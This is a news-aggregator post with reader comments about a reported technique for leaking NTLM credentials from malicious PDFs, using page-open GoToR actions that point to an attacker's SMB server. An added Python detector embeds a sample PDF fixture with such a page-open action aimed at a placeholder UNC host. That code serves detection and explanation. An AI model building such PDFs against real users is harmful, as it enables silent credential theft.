
posted by janrinok on Saturday May 05 2018, @01:51AM
from the not-the-best-best-explanation dept.

Submitted via IRC for SoyCow8317

NT LAN Manager (NTLM) credentials can be stolen via malicious Portable Document Format (PDF) files without user interaction.

PDF files, the security researchers explain, consist primarily of objects, together with a document structure, a file structure, and content streams. There are eight basic types of objects, including dictionaries, and a malicious actor can abuse these to steal NTLM credentials.

A dictionary object represents a table containing pairs of objects, called entries, where the first element is the key (a name) and the second element is the value (which may be any kind of object). The pages of a document are represented by dictionary objects called page objects, which consist of required and optional entries.

One of the optional entries is the /AA entry, defining actions performed when a page is opened (/O entry) or closed (/C entry). An action dictionary is held within /O (or /C) and consists of three required entries: /S, /F, and /D, describing the type of action to be performed (GoToR, Go To Remote, or GoToE, Go To Embedded), the location of the other PDF, and the location to go to within that document.

"By injecting a malicious entry (using the fields described above together with his SMB server details via the '/F' key), an attacker can entice arbitrary targets to open the crafted PDF file which then automatically leaks their NTLM hash, challenge, user, host name and domain details," Check Point explains.
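A raw-file detector for the page-action pattern described above, added here as an example (it is not code from the article, SecurityWeek or Check Point): it walks each /AA dictionary, inspects its /O and /C actions, and flags GoToR or GoToE actions whose /F string points at a UNC path or URL. The embedded sample PDF and the host files.example.invalid are constructed placeholders.

```python
import re

# Constructed sample (not from the article): a minimal PDF whose single page has
# an /AA entry with a page-open (/O) action of type /GoToR. Its /F file spec is a
# UNC path to a placeholder host; in a PDF string each backslash is written "\\".
SAMPLE_PDF = rb"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792]
  /AA << /O << /S /GoToR /F (\\\\files.example.invalid\\share\\doc.pdf) /D [0 /Fit] >> >>
>> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Remote target: UNC path (\\host\...), //host path, or a URL scheme (smb://, file://).
REMOTE = re.compile(r"^(\\\\|//|[a-z][a-z0-9+.-]*://)", re.I)

def balanced_dict(data: bytes, start: int) -> bytes:
    # Return the dictionary text that begins at data[start] == b"<<", with
    # nested << >> pairs balanced (assumes none occur inside string literals).
    depth, i = 0, start
    while i < len(data) - 1:
        pair = data[i:i + 2]
        depth += (pair == b"<<") - (pair == b">>")
        i += 2 if pair in (b"<<", b">>") else 1
        if depth == 0:
            return data[start:i]
    return data[start:]

def pdf_unescape(s: bytes) -> str:
    # Undo the PDF string escapes that matter for a path: backslash and parens.
    s = s.replace(b"\\\\", b"\\").replace(b"\\(", b"(").replace(b"\\)", b")")
    return s.decode("latin-1")

def find_remote_page_actions(data: bytes) -> list:
    """Flag /AA open (/O) or close (/C) actions of type GoToR/GoToE whose /F
    string names a remote location. Raw-file scan only: dictionaries inside
    compressed object streams (/ObjStm) and hex-string /F values are not seen."""
    hits = []
    for aa in re.finditer(rb"/AA\s*<<", data):
        aa_dict = balanced_dict(data, aa.end() - 2)
        for trig in re.finditer(rb"/(O|C)\s*<<", aa_dict):
            action = balanced_dict(aa_dict, trig.end() - 2)
            kind = re.search(rb"/S\s*/(GoToR|GoToE)\b", action)
            spec = re.search(rb"/F\s*\(((?:[^()\\]|\\.)*)\)", action)
            if kind and spec and REMOTE.match(pdf_unescape(spec.group(1))):
                hits.append({"trigger": "/" + trig.group(1).decode(), "action": kind.group(1).decode(),
                             "target": pdf_unescape(spec.group(1))})
    return hits
```

Run it on a file with `find_remote_page_actions(open(path, "rb").read())`; any hit deserves quarantine, since the /O trigger fires when the page is opened and needs no click.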

Source: https://www.securityweek.com/pdf-files-can-silently-leak-ntlm-credentials

  • (Score: 3, Insightful) by bradley13 (3053) on Saturday May 05 2018, @12:08PM (#676045)

    PDF was supposed to be an output format. It never should have introduced any sort of active or executable content.

    --
    Everyone is somebody else's weirdo.
  • (Score: 0) by Anonymous Coward on Sunday May 06 2018, @12:57AM (#676214)

    Funny thing! PostScript is Turing-complete, and PDF extends PostScript.

    • (Score: 2) by maxwell demon (1608) on Sunday May 06 2018, @07:39AM (#676292)

      While PostScript is indeed Turing complete, and PDF was based on PostScript, PDF is not an extension of PostScript. In particular, its graphics language is not Turing complete. Adobe removed precisely those constructs that made PostScript Turing complete (recursion and unbounded loops).

      Of course, later Adobe added JavaScript to the PDF specification, which again is a Turing complete language.

      --
      The Tao of math: The numbers you can count are not the real numbers.
      • (Score: 2) by requerdanos (5997) on Sunday May 06 2018, @12:41PM (#676346)

        Adobe added JavaScript to the PDF specification

        If that phrase doesn't cause you nightmares as a tech person, perhaps nothing will.

  • (Score: 2) by maxwell demon (1608) on Sunday May 06 2018, @07:25AM (#676288)

    More importantly, it should never cause access of anything other than the document's content.

    --
    The Tao of math: The numbers you can count are not the real numbers.